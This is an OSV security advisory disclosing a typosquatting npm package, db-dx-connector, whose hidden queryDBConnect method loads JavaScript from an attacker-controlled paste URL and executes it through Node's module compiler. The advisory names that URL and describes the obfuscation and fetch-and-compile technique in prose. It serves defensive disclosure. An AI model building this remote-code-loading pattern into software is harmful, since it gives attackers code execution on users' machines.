MAL-2026-5463

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-dx-connector/MAL-2026-5463.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5463
Published
2026-06-09T20:18:26Z
Modified
2026-06-26T19:01:38.628262410Z
Summary
Malicious code in db-dx-connector (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759)

The package name db-dx-connector inverts the word order of the legitimate dx-db-connector package (whose own GitHub URL github.com/divbloxjs/dx-db-connector is referenced in this package's metadata). It replicates the legitimate package's MySQL-connector API surface and adds an undocumented method queryDBConnect in index.js (lines 226-238) that constitutes a backdoor: a base64-encoded URL stored in a misleadingly named HASH_KEY constant decodes to https://www.jsonkeeper.com/b/ZIAIK (an anonymous, mutable paste-hosting service), the method fetches .data.content from that URL via axios, constructs a synthetic Node module, and calls m._compile(s1, 'error.js') to execute the fetched JavaScript inside the consumer's Node process. Errors are silently swallowed in a try/catch. Whoever controls the paste can ship arbitrary code into any process that calls queryDBConnect(). The combination of name inversion against a real package, base64 URL obfuscation, anonymous attacker-controlled host, runtime fetch+compile of remote JavaScript, and silent error suppression is an unambiguous remote-code-execution backdoor.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.0"
            ],
            "sha256": "6eeeef7d309b24e00c0e45df8736d1d8b8d279207d2bfa766c75890815e5382d",
            "modified_time": "2026-06-09T20:18:26Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005190",
            "import_time": "2026-06-09T20:45:50.787271159Z"
        },
        {
            "versions": [
                "1.0.1"
            ],
            "sha256": "b0a6cd3a84c38e801823eba4ccf0d4ff2a28f5955309bfb300f7f0f640b1a69b",
            "modified_time": "2026-06-16T22:47:12Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006858",
            "import_time": "2026-06-16T23:03:44.318776268Z"
        },
        {
            "versions": [
                "1.0.2"
            ],
            "sha256": "ee8717a253384a26fdaea14cf33003127a3ab77c8ec5cc28e93f73ba79d3e0f9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-18T19:08:47Z",
            "import_time": "2026-06-18T19:20:02.780433786Z",
            "id": "IN-MAL-2026-007023"
        },
        {
            "versions": [
                "1.0.3"
            ],
            "sha256": "074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759",
            "modified_time": "2026-06-26T18:12:40Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T18:42:49.694195222Z",
            "id": "IN-MAL-2026-007650"
        }
    ]
}
References
Credits

Affected packages

npm / db-dx-connector

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.3

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "db-dx-connector-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-xxK01exWEJD1dj5iX/S23WoZ/RT1QH4y+6yDysyyrsXn0tZg3ut2RK5vHZtS1cgnImaHWYiMJXeEUSOZGLBnJg==",
                "sha1": "4621c8f4e81dda030638bbdd54dbca0407770454"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "7e8b618753db019263d7d472f0ca2a1561c428cc7dae515032d9677bb5d4d892",
            "path": "index.js",
            "tlsh": "d672300637f72527017b7068a6cb5080a439f41b2b35d860be5cc6715fa87b8bda37d8"
        },
        {
            "sha256": "a3b56e8adb7dfc3d892216b7d548536f6c19e2917c23b1757ac95b1c69d4c8d5",
            "path": "package.json",
            "tlsh": "32016835c9201ca316ab36984c555105b12190ebcf08ed4477cc116ccf6e29b22ae3ae"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-dx-connector/MAL-2026-5463.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]